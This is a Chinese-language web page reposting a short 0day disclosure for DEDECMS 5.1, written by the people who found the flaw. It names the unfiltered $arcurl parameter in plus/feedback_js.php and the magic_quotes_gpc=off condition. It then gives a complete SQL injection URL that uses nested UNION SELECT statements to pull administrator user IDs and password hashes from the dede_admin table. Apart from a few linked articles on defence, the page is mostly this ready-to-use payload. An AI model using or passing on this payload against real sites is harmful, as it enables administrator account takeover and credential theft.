新聞中心
這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
DEDECMS 5.1 feedback_js.php 0DAY
這個(gè)漏洞是我和Rainy'Fox一起發(fā)現(xiàn)的

同樣是在magic_quotes_gpc=off的情況下可用
漏洞版本:DEDECMS 5.1
此漏洞可拿到后臺管理員的帳號和加密HASH,漏洞存在文件plus/feedback_js.php,未過濾參數(shù)為$arcurl
看一下利用方法吧,嘿,為了閉合我用了兩次union
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
【編輯推薦】
- 重新審視企業(yè)IPS的應(yīng)用:防御SQL注入攻擊的利劍
- SQL注入攻擊及其防范檢測技術(shù)研究
- 安全技巧:學(xué)會檢查SQL注入式攻擊漏洞
網(wǎng)頁題目:DEDECMS 5.1 feedback_js.php 0DAY
分享網(wǎng)址:http://www.dlmjj.cn/article/cdihish.html


咨詢
建站咨詢
